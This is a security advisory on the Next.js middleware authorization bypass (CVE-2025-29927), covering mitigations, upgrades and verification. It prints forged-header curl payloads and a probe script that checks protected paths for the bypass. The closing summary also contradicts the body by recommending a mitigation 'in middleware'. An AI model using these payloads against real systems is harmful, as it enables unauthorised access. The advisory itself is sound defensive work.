ConfigDeck
Severity: Critical (CVSS 9.1) · Ecosystem: npm · Package: next · CWE-285 (Improper Authorization)

Next.js Middleware Authorization Bypass (CVE-2025-29927)

Published
Mar 21, 2025
Last updated
May 9, 2026
Status
Active
GHSA
GHSA-f82v-jwr5-mffw

Summary

A critical (CVSS 9.1) authorization bypass in Next.js middleware affecting every supported major line, 12.x through 15.x (12.0.0–12.3.4, 13.0.0–13.5.8, 14.0.0–14.2.24, 15.0.0–15.2.2). Sending a forged x-middleware-subrequest header makes the runtime treat an external request as one of its own internal subrequests and skip middleware entirely, so any authentication or authorization enforced there never runs. Upgrade immediately to 12.3.5, 13.5.9, 14.2.25 or 15.2.3 (or later) for your major.


Affected versions

Affected version ranges and patched versions
Affected range          Patched
>=15.0.0 <15.2.3        15.2.3
>=14.0.0 <14.2.25       14.2.25
>=13.0.0 <13.5.9        13.5.9
>=12.0.0 <12.3.5        12.3.5

Hosting environment impact

The blast radius depends on how middleware is executed. Each hosting environment has to be checked separately.

  • Vercel Edge Middleware: Affected. Vercel applied a platform-level mitigation at its edge, but the application itself stays vulnerable while it runs an unpatched Next.js version; the platform mitigation does not travel with your code to another host or to local and CI environments, so it is not a substitute for upgrading.
  • Netlify: Affected. Netlify Edge Functions that run Next.js middleware can be bypassed in the same way; check your Next.js patch level rather than relying on the platform alone.
  • Cloudflare Pages (next-on-pages): Verify separately. Whether a client-supplied header reaches the middleware depends on the adapter's implementation; check both the adapter version and the Next.js patch level, and confirm with a test request against a protected path.
  • Self-hosted Node.js (next start, Docker, PM2 and similar): Affected, with no platform mitigation in front of you. If middleware is your authentication gate, upgrade or strip the header at your reverse proxy before traffic reaches Next.js.

Vulnerability mechanism

The Next.js runtime uses an internal x-middleware-subrequest header to mark requests that originate from inside middleware itself (for example a fetch() issued by middleware), so that middleware is not re-run recursively on them. The value is a colon-separated list of middleware names; when the runtime finds its own middleware in that list (an exact name match in older versions, the name repeated enough times to hit a recursion limit of 5 in recent versions) it skips middleware for that request. The header was meant to be set only by the runtime, but nothing checked its origin: a value sent by an external client was trusted exactly like an internal one.

The bug, then, is a code path that skips middleware execution entirely, before any of your middleware code runs, whenever the header matches. An attacker can therefore reach a protected handler without ever triggering the auth/authorization middleware:

curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     https://target.example.com/admin

The name must match your project layout: use src/middleware in place of middleware when the file lives under src/, and older 12.x projects that still used the pages-level layout compared against a single pages/_middleware rather than a repeated name.

CVSS 9.1 (Critical) reflects: (1) an authentication bypass with immediate confidentiality and integrity impact, (2) no preconditions, since the attack is network-reachable, low complexity and needs no privileges or user interaction, so any anonymous client can attempt it, and (3) a wide blast radius, because middleware is the documented place to put an authentication gate in Next.js projects.
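The following is an added illustration for this page, not Next.js source code: a simplified model of the decision the runtime made before running middleware, in the shape the advisory describes. It contrasts the exact-match and recursion-limit variants of the vulnerable check with a hardened stand-in that discards any externally supplied marker and trusts only a per-process random secret. The middleware names, the recursion limit of 5, the x-middleware-subrequest-id header name used for the secret and the sample requests are assumptions of the model.

```javascript
// Added model for this page, not the Next.js implementation.
// Assumptions: middleware name "middleware" (or "src/middleware" under src/, or
// "pages/_middleware" on the old 12.x layout); recursion limit 5.
const MAX_RECURSION_DEPTH = 5;

function parseSubrequests(headers) {
  const raw = headers['x-middleware-subrequest'];
  return typeof raw === 'string' ? raw.split(':') : [];
}

// Older vulnerable check: skip middleware as soon as its name appears in the list.
function skipsMiddlewareExactMatch(headers, middlewareName) {
  return parseSubrequests(headers).includes(middlewareName);
}

// Recent vulnerable check: skip once the name appears MAX_RECURSION_DEPTH times.
function skipsMiddlewareDepthLimit(headers, middlewareName) {
  const depth = parseSubrequests(headers).filter((n) => n === middlewareName).length;
  return depth >= MAX_RECURSION_DEPTH;
}

// Hardened stand-in (not the project's exact code): externally supplied markers are
// discarded at ingress, and only a per-process random secret that the runtime itself
// attaches to its own subrequests is trusted.
const SUBREQUEST_SECRET =
  globalThis.crypto && globalThis.crypto.randomUUID
    ? globalThis.crypto.randomUUID()          // CSPRNG where the global is available
    : Math.random().toString(36).slice(2);    // demo-only fallback, never for production

function sanitizeIncoming(headers) {
  const clean = { ...headers };
  delete clean['x-middleware-subrequest'];
  delete clean['x-middleware-subrequest-id'];
  return clean;
}

function markInternalSubrequest(headers) {
  return { ...headers, 'x-middleware-subrequest-id': SUBREQUEST_SECRET };
}

function skipsMiddlewareHardened(headers) {
  return headers['x-middleware-subrequest-id'] === SUBREQUEST_SECRET;
}

// The skip decision is taken before the middleware function is invoked, which is why a
// header check written inside middleware.ts cannot defend a vulnerable version.
function handleRequest(headers, middleware, skips) {
  if (skips(headers)) return { middlewareRan: false, status: 200 };
  return { middlewareRan: true, status: middleware(headers) };
}

// Constructed auth gate: only a valid session cookie may reach the handler.
const authGate = (headers) => (headers.cookie === 'session=valid' ? 200 : 401);

// Constructed sample requests for a protected path such as /admin.
const anonymous = { host: 'target.example.com' };
const forgedDepth = { ...anonymous, 'x-middleware-subrequest': 'middleware:middleware:middleware:middleware:middleware' };
const forgedExact = { ...anonymous, 'x-middleware-subrequest': 'pages/_middleware' };

function demo() {
  const depthLimit = (h) => skipsMiddlewareDepthLimit(h, 'middleware');
  const exactMatch = (h) => skipsMiddlewareExactMatch(h, 'pages/_middleware');
  return {
    anonymousOnVulnerable: handleRequest(anonymous, authGate, depthLimit).status,            // 401: gate holds
    forgedOnVulnerable: handleRequest(forgedDepth, authGate, depthLimit).status,             // 200: bypass
    forgedOnOldLayout: handleRequest(forgedExact, authGate, exactMatch).status,              // 200: bypass
    forgedOnHardened: handleRequest(sanitizeIncoming(forgedDepth), authGate, skipsMiddlewareHardened).status, // 401
    internalOnHardened: handleRequest(markInternalSubrequest(anonymous), authGate, skipsMiddlewareHardened).middlewareRan, // false
  };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

Note that three repetitions of the name (the payload shape sometimes seen in write-ups) do not reach the recursion limit in this model; five do, which is why the curl example above repeats the name five times.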

1. Upgrade to a patched version

# Upgrade to the patched version for your major (see the list below)
npm install next@15.2.3
# Or the latest stable
npm install next@latest
# Confirm the version that actually resolved in your lockfile
npm ls next

Minimum safe versions per major:

  • Next.js 12: 12.3.5
  • Next.js 13: 13.5.9
  • Next.js 14: 14.2.25
  • Next.js 15: 15.2.3

2. Temporary mitigation (before patching)

If you cannot upgrade right away, remove the x-middleware-subrequest header before the request reaches Next.js. A check placed inside middleware.ts cannot do this: on a vulnerable version the runtime consults the header before deciding whether to run middleware at all, so code in the middleware never executes for a forged request. The check has to sit in front of the Next.js request handler. For a self-hosted deployment, a custom server can drop the header on the way in:

// server.js (replaces `next start`; run with `node server.js`)
const { createServer } = require('http')
const next = require('next')

const app = next({ dev: process.env.NODE_ENV !== 'production' })
const handle = app.getRequestHandler()

app.prepare().then(() => {
  createServer((req, res) => {
    // Drop the internal-only marker from anything arriving on the socket so that
    // an externally supplied value can never short-circuit middleware.
    delete req.headers['x-middleware-subrequest']
    handle(req, res)
  }).listen(3000)
})

Removing the same header at your reverse proxy or WAF (Cloudflare WAF, AWS WAF, or in nginx with `proxy_set_header x-middleware-subrequest "";` in the location that proxies to Next.js) gives an immediate platform-wide fix while you roll out the upgrade, and keeping the header away from the application is the mitigation the upstream advisory recommends. One caveat: if your middleware calls fetch() against its own origin, those internal subrequests legitimately carry this header so that middleware is not re-run on them; stripping it sends them through middleware again, so test such flows before relying on the mitigation.

3. Verifying the fix

After upgrading (or deploying the header-stripping mitigation), send two requests to a protected path: one without the header and one with the payload for your version and layout (five repetitions of middleware, or of src/middleware when the file lives under src/; a single pages/_middleware on the old 12.x layout). Both should now receive the same gated response (401/403 or a redirect to login). If the request carrying the header gets a 200 where the bare request is turned away, the bypass is still live. Check the resolved version with npm ls next as well, because a proxy mitigation can mask an application that is still unpatched.
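The check above, as an added verification helper for this page (not part of the advisory or of Next.js): it sends a baseline request and one request per known header variant to a protected URL, then classifies the result. It assumes Node 18 or later for the global fetch, takes the target URL and middleware name from the command line, and should only be pointed at systems you are authorized to test.

```javascript
// Added verification helper for this page; not the advisory's or Next.js's own code.
// Assumptions: Node 18+ (global fetch); target URL and middleware name from argv;
// default middleware name "middleware", use "src/middleware" when the file is under src/.

// Header values the vulnerable runtime accepted, across the affected majors.
function buildPayloads(middlewareName = 'middleware') {
  return [
    'pages/_middleware',                       // old 12.x layout, exact-match check
    middlewareName,                            // root middleware, exact-match check
    Array(5).fill(middlewareName).join(':'),   // recent versions, recursion-limit check
  ];
}

// A gated response is a rejection or a redirect (typically to the login page).
function isGated(status) {
  return status === 401 || status === 403 || (status >= 300 && status < 400);
}

// VULNERABLE: at least one header variant turned a gated baseline into a 2xx.
// PATCHED: every variant still received a gated response.
// INCONCLUSIVE: the path is not protected even without the header, so it proves nothing.
function classify(baselineStatus, probeStatuses) {
  if (!isGated(baselineStatus)) return 'INCONCLUSIVE';
  return probeStatuses.some((s) => s >= 200 && s < 300) ? 'VULNERABLE' : 'PATCHED';
}

async function probe(url, middlewareName) {
  const statusOf = async (headers) => {
    // redirect: 'manual' keeps the 3xx so a login redirect counts as gated.
    const res = await fetch(url, { headers, redirect: 'manual' });
    return res.status;
  };
  const baseline = await statusOf({});
  const probes = [];
  for (const value of buildPayloads(middlewareName)) {
    probes.push({ value, status: await statusOf({ 'x-middleware-subrequest': value }) });
  }
  return { baseline, probes, verdict: classify(baseline, probes.map((p) => p.status)) };
}

// Usage: node verify-bypass.js https://target.example.com/admin middleware
if (typeof require !== 'undefined' && require.main === module) {
  const [url, name = 'middleware'] = process.argv.slice(2);
  if (!url) {
    console.error('usage: node verify-bypass.js <protected-url> [middleware-name]');
    process.exit(2);
  }
  probe(url, name).then((r) => console.log(JSON.stringify(r, null, 2)));
}
```

The verdict is computed relative to the baseline rather than from the probe status alone, so a path that was never protected is reported as INCONCLUSIVE instead of as a false PATCHED.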

Summary

This vulnerability bypasses Next.js middleware authentication directly and is a critical-severity authorization issue. Any project that relies on middleware as an authentication gate should upgrade to the patched version immediately. If an immediate upgrade is not possible, apply the temporary mitigation in middleware or at the WAF layer first, then roll out the upgrade in a controlled fashion.

References

Credits

  • Allam Rachid
  • Allam Yasser

This page is based on the following data sources:

  • GitHub Advisory Database (CC-BY-4.0) — github.com/advisories
  • National Vulnerability Database (Public Domain) — nvd.nist.gov
  • MITRE CVE Program (royalty-free) — cve.mitre.org
